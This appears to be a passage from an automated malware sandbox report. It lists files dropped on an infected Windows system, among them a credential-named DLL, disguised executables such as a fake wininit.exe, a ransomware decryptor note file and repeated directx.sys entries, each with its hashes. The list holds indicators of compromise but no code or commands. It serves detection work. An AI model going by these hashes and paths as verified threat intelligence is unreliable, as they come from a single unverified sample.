                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    1.2MB

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    92fbdfccf6a63acef2743631d16652a7

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    971968b1378dd89d59d7f84bf92f16fc68664506

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    b4588feacc183cd5a089f9bb950827b75df04bd5a6e67c95ff258e4a34aa0d72

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    b8ea216d4a59d8858fd4128abb555f8dcf3acca9138e663b488f09dc5200db6dc11ecc235a355e801145bbbb44d7beac6147949d75d78b32fe9cfd2fa200d117

                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_F4FC4769816045B2A3D1E3DD95B5A6BC.dat
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    940B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    8d48a6bb5ada09c5608a15914e6fc36b

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    578b300c63f328a035278b4a27fe5fda069566f0

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    cc56ee5b8ebf08ccd5d8c75e84fb1e0322d3b9a836318786fb8c9853d76bafb4

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    ec7638ddf01e9ed9498a1d2456502dad7dca3954b7f96c8d7c0c94ee388f857e8c8e4cdd3b47efd3b7fb9749ac7d5ca81e3c7b23f946b01704a2261e053ed9fd

                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\configurationValue\newss.exe
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    297KB

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    bf16dc9b561369711e87666a91220711

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    07823b283171caa390e8d10f3b72398dd3d9fc83

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    5cb25bf182c14df7ae7dd13b0aa221ed0abe491cb82da6726595c34ce5e59a4d

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    44dbbfdab99f57652a9a881958d020c0f06d88952a26d7ede45e8522f2d53c2c756c4aec0146daff60723c5265165e3d2f77fcf735362dd358b807d90beab9ab

                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    cc90e3326d7b20a33f8037b9aab238e4

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    236d173a6ac462d85de4e866439634db3b9eeba3

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    bd73ee49a23901f9fb235f8a5b29adc72cc637ad4b62a9760c306900cb1678b7

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    b5d197a05a267bf66509b6d976924cd6f5963532a9f9f22d1763701d4fba3dfa971e0058388249409884bc29216fb33a51846562a5650f81d99ce14554861521

                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\configurationValue\traffic.exe
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    381KB

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    2a962db2ec75a501e29468478cc4daf0

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    6dba32665df9fa8b9d5899c527823ae9cfc0f042

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    ffbde810025367bc18747442761de7523d93510b6f7ca5cac195f4cc294ff6a5

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    2c90024880601f8994d89cb40fee0d20c2dc7d15f9cd178a0fab65a59f4c5583d47f740d9fa421f70b1e853b811aa6034cd7b450a6b96b59c94fae3d82182e0a

                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\1.exe
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    89KB

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    69a5fc20b7864e6cf84d0383779877a5

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    6c31649e2dc18a9432b19e52ce7bf2014959be88

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    4fe08cc381f8f4ea6e3d8e34fddf094193ccbbcc1cae7217f0233893b9c566a2

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    f19f3221a26bdab7ddcf18196ef6e6012968c675065c4e56f54faaace18321c07771fdbdacabd365159ccc5bf01e40693146709217e13dcd282609242e61a4bc

                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\10.exe
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    3.4MB

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    6d24c72d4d4be1861565990207355cbb

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    c6c0e3d256a5a49699f24662586142f447b665c2

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    5ccfce8af05298bba260f048064d11ca08f895e38665634414a4193e47ff2a1d

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    e0ca37608e6db75c2e5a6c10a036372750e1730cc71c821e4846f16daf68daca0c31ea9d556c3f131d11e48ce9de65a135ac27f6e63c1af36299d677db4d9f0a

                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\2.doc
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    803KB

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    7f6c623196d7e76c205b4fb898ad9be6

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    408bb5b4e8ac34ce3b70ba54e00e9858ced885c0

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    3a5648f7de99c4f87331c36983fc8adcd667743569a19c8dafdd5e8a33de154d

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    8a57b3c14fe3f6c7ea014f867924176d3b9c07ad6195b0e5fa877e16b55b1c23e4abfdf24b7e7a0dffafe8991d4878d98dad1419be03f27f64f0c95720542dee

                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\@[email protected]
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    280KB

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    70aeca0900d87e44b1df8ee2b483c13a

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    259905763629d129cc86be371dd09462f8900333

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    a12d6a8c09b0a451a6c334f1f7a7dcd91bb49283f0edabd774033b83658817f2

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    371f2b3d0a679508f5963f12c17d13ed6a70ec79d5aba7a5af31bbaae63a4bde0ce2878cb3acac706a1df1b4885b6ee3159601555a8d7f4d55d4ff54fe0f36cb

                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\@[email protected]
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    944B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    78439bd025530a2439716f27f93e4b2c

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    4a4bfd479720287972b793370d93ad56b71efd1f

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    507594a2615d2cea6ad500fb14e3361175cdbd80db908ddb045c9c3ab62670a9

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    f503b9ae5384f6afdfa0fad985ee61283a31c1c9146ae5f277f7a87f7e29df25f1d534de80c80c1dbdadde36724360d98fcdc13f65f0b3bea8e778873f894761

                                                                                                                                                                                                                                                                                                  • C:\Windows\Registration\CRMLog\wininit.exe
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    2.9MB

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    83bdd32d3c431b7e11d2c02dd0a6d492

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    94b0ff00c5487834ec30227cd25d5fb66ca7241d

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    f5856d693661288c6ad03df2b881d3c4cd3bd39125119b1674485ffc0af8fe1b

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    ed3dcdfbbbf8a8573e326a03410c29e861f1a14422bec6315ce7bdf2bc1b6d7fffb68c76fcd007c0253f8a9a91343250243f7f02a3cfaba5d4a76827aaa8654c

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    43B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    e08da1f05efb3b6d438640a92d92761c

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    cd8f9ad002181ebf87a3625734498ddc4a50ec59

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    b981c91e4a64e872ae4c83dc193e4a5b3007a36f2b9e24b065aae6105ebd8a52

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    e4c128d705de71ab84d99894deba6e52b01a22d95186008febdffab21084ae3f4ea601bf610a4f94c717f68f00eb177a20b4008c91227671b7b08548a6b1067d

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    86B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    f885d87964363b63dd02fa0764914e34

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    f4040260ce0513af83c51129835e39fc1dc5b8cd

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    6fe00c54216384322f650a0eee44b055009039ebb425ed0c07c458e32c97740f

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    054af68bcf1bbfe0721fe210d9a56fa5d43bef94107c45c84e34edea6df9d05ea4d7e019a1c25d2e6568d903992164ed12f5e58dc7fb866956e0b41a56f61b1b

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    76B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    033a21d049cf5546fe0537f15435c440

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    2da12b487030fb6300e992b474860444229dfad6

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    bdb8157f9c7d593b90df878e8010f87c3d3f18108e43d2e50415b36c5536f3d1

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    0a60df9963d3b5adb25347d1270163d7257dd0823a4435a7a07a3a0dfdeeef6e9b06d1101f672453b5cdc63bdbc18d4fd43e813fc6220a5c764a276190bcc224

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    100B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    d1a388e8fd37825e295b8c228f824d29

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    db01350c8a655069ce7211276ad8492cb590e567

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    b669e6e5f8681e7d5aeea608b13f7c9176804f5346cfc60da86da35a397d7adf

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    0e8b0746b9c8a664b80f605af394a506615029953cd100cda68ad600041b60fa1f8d94741c755c69a83ff89b7ad315d4dd7b42b659f9e9baa49bc99b3c7208a8

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    24B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    c93ff55f5c5a9e2323b2f5d677bdbee1

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    3e1c36c7d34bafad15e140ce5b03734f6aa87d1d

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    15a9b8e44230a9fef940f579e061c1db4244d2aae8a68f6139227b034e9f28cc

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    8912432056d997f4847afcebbe0dca43e3d8bc249d539ebf937ab77871d797d6f84ff860fbccec6bffab898bf18edb30ea5805e8ed8c63e05a3272b0e512aa3a

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    61B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    aea79e4e88434f4dacc1a784a1b07f80

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    453627f2893ad38e6f4d76bbdc3158d252f55a9e

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    af169b2e15884354e85c3729951f8688877efd8b5951727fa69edc8f05a030c1

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    6b8b174b8a665ad6c9782194c73b054b882b1a7d59495ab088e4ff492721b28aa71957fe75b1edb4a7fa4f8dc04dee086e9de2a3d73aa3b9061fe2fa70a234b2

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    61B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    6edf72bacbc267520fb88ced43c1a794

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    2240b22319bceaf70a06dac5df7f59655b87b31a

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    b360c65ba5041e9a3521e162190c62dbfbe51201b18aa0e9ff272119f91e8511

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    ef75d9fa02219ee0f913996d33a6e26d6bcf77c808658c6d9fd7aaf41e5aabd9cc211a3685e38d7b8e99b8ae93ec75a09c4cf3d15487a1097d4f99da8d30602c

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    61B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    2b2c3b6b3d0b4d0e421ccf19b5f1cefb

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    432888e4d9ed703f151d4c06443236c7b1b515cf

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    50cf089f5f17cb85653ae62f32d89280edefd809026998011c91a4b90cad431e

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    5a06e3dfe11d977503e0cf28698bacd0d71aee51ec7538093474425508bc6912e12545e0480b8772e1b37368fb07999b25c35bd8789cfb493fd1d4bb87a64a7f

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    29B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    e48dd15c2622de57f9d96167526aa29b

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    227e44c82be64d3b54a0d237018a874ea16c6982

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    b84d90ce79f74578bf032d5481e92435bb92dc5da421f090dacf3184478d0e60

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    371d73f5ebbb28aa7ff462905c6176f35c817dc18bed35d06b6e68022c6887b871fcf655fd0190523ebf3a16818c8df3bb6479fb27aef2175fa0894105ec0aa0

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    62B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    27505c31fc8e044d95f53bf7a5d2075c

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    f942f06d6566acfbf8d3cf6c2afc7580929488f4

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    4e7bae49c2cc250568a4ae47472be7f889d85e7cbab0477845fe5ea742570fb9

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    0d1a376fa75fefe6b39e3f475a383a719080f83b8bc58e5d310b121c3b4ad6ab73eef84f9e27a58b5afe657dcf3893f93dcf8410c02461000bc5564a79f979fc

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    50B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    03ab650ab59b7cfafce43d20423b29d9

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    3a4ebb28b3d9920af7bceb13ea7c10348afc1a09

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    85dd37b18803b37c6cd82cbbd9fa10b9ca02f3da8965467fa92cc2afe56f6d26

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    7b4b2f9ac290c35ee9b53a59586dab77365172001dbaa66cc3da792b45de2d7e0168aaf711740463adb2e4c415c5eb54de408a5929014e371ff8a8408998d1de

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    109B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    0def511f8f1eeb0014245ce188808d68

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    9999bec94c059610e1b9f79fa6081c98a884341d

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    0a24470798c14297dcb3a78ebc7adf5f5706304fb2961d3169b2c94ac683cbc8

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    2b8716b65b6326c178c2500066b90c0af00789ca9995ab3aa863222b325a488a0e9df29bf39997df4d419a28f39cdd00e41c9abed88cfc350fa27779c33e5ed6

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    112B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    804f5f9bfe50714aefb9994e94810304

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    8040c7215ac75b435b118b8dca6f9359ec49aa7d

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    826a6b7658cc7cb496967d18b4787e3cfb8538e0c6a5abdd17a24c5cf801e772

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    1439ef15225504c3530817807f6ddb77bcb2cb4184825aec7ecdd16df78ab3963cd2d465007f0861f95fa0e118cf2bbed853d159c50d7dabe226576e7c0a0347

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    154B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    a43af2e8e843829865cea35cf86e78ee

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    900ccfd6814b672082d6e03e0010a47e85bf1fad

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    e62437b49f1a1a72d7651883ad0f6e30b7738986901d4a45b4714c716797f71a

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    118434ab6ff98505b5cdf81df730d887aec0da7edf09e43a359b5f8754aafc508973483fd197ae01de2db7248521344fc7965e206fa2c722dee4df19c20d0cca

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    213B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    e5874bc27a0202649e667c20cbf85f45

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    3d59c05ebd9eb90d7267187f4f1694d484c62d2d

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    6517d390f0cabd19297896a5f131cb5b0f1df5cb01e4592adae397dd3406420f

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    ee46492526628a1720db55890378cf4103cdb53c2f55f26fb3c37dae0a748e78df39b077f818c26fc869d576fb96b5d4180d833f5e96aed41ff7fee3dc3b6924

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    213B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    14a91df1185b3276e3555745899405b0

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    6f984e00daada15e4cbdb52bf455462562a4f783

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    35175bd720575bf72d331052dc75755d1b7ea9ab108caf13f7c26f593ecbc09d

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    77c8087750d14191f5553cf59eebe25a1d0be1f00496c12aeee80a1cddfa3377e32b89372038d81e8f9d0669d826069c3d6d3bb8fb1148ce8345018df83fbfe8

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    215B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    5f621177bdca60f8e558fceecadf359a

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    a794112f495d5fcf069bc52f7bb55dedc6f450ce

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    59b0fc4a8430a40e7f501902b02d9c3845a309925795172a87f01462b9c14060

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    69bd873e07c1b560124c813aa080de561812775f0b3e97f6a339a9bae52e0312f7f5538d3a14450d1ca0a348c4f8c497f99a6371c46753e9bfabc7153361d1ba

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    206B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    9d27a4b3e771a2260cbcdffbb969d22a

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    a77b68717866acc588d2d1ce2bb9292804901954

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    a3f343f624b8f958fbf539c233fcb8a53dac320e2c42b8243283a6e506579c22

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    c32f1e891a9c996b3990fd6fdfdd34134027feb7bfba82541c4c4ea6639b048b3a340d9eedf4710585c82554e469869e2c2fd6c6939e1a7a28be67d3863966c6

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    259B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    0854568c41d9a4474be81ec632450817

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    9b7bd3332068fc8faef86d6c658dc81dae4bf55b

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    58f4e7f42352ce61d19935ca2783c0f6f419d33dbae4db27bb9e391e3b91b65f

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    2889eb5a3f3c30d3ffb3c646454288b0c1eca4d84e827fa51538196eefea5349fbe118aeaa5e6615a70c4a00dba38e241353e33dcac7fec7935c51e84225102c

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    240B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    2ee78fe3842577eb8a888ed6d925f6c7

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    3c76882848a20804c555599175a6abddb3f4f102

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    bd1810f13309d62f4dcd5eaa5640c65349afdd15a5bd3dda903aaa4b7ef04ee5

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    88f702cf2d743b78a6e44c404b4a09c15cd1ecf1ef2258c372180e9a5e2f6183fb0b298ea09c3d2f88ea871fea516fa7682d78fc8f099a116f0155e0304d3bc5

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    259B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    2b2f8752a2bf6ca95c5a57c1210e58af

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    cf0808a6f9941b92578847643466fce4787869da

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    d21157f4822e71b85a2d3296b43f4276ccac91e553a659a9cf21250fbca9ef73

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    07c73f3185ebb848c53537bac83fb16cadc10dfb34d7154aade778276f8e29e565aa82058b502cf542b2511e44d48422f6c92bef13ec663fdb2f33589cc117a3

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    303B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    61366b21bb2c70a019b1318026a01c65

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    1cce3f60b0a7b34f8bbd653f17188b4d4a293c75

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    647f4efe11e4d03d6a6bb672784a653ed4ab9ddc8dc7f0151ab9fcbefa0c80d9

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    322a47cd774fc6a46ce007a91394564e9708c74642b982bfc2e29a4913aca69b428361fc02e20865e29ae7a5319c3e09d7d01f4560283b0722b892212a96b711

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    263B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    d69aff212572d2ab2c78bb9a331c14aa

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    98537d1efbbba63555c3384b47ae2f074574c356

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    863b76b6c6e23f433bed6e329346ffd37b1a42f9896a46f110fe6afed9c264af

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    5df9be6fafc64c2f34c79dfd9b123024a4af965a1546d868d5aa8e617f55a3828b10e05421a9e9131cb5604023da95c46ec718c62ef77408b1de189cc6cb453e

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    261B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    43b8bda4944c9b0de5b437c73fddd24d

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    d519cc782bcd100b54b02cf0cc51823b22aa82e7

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    3c39bbb2747ed9d333857256475689f6911be83d47c4269c3557d726513ab615

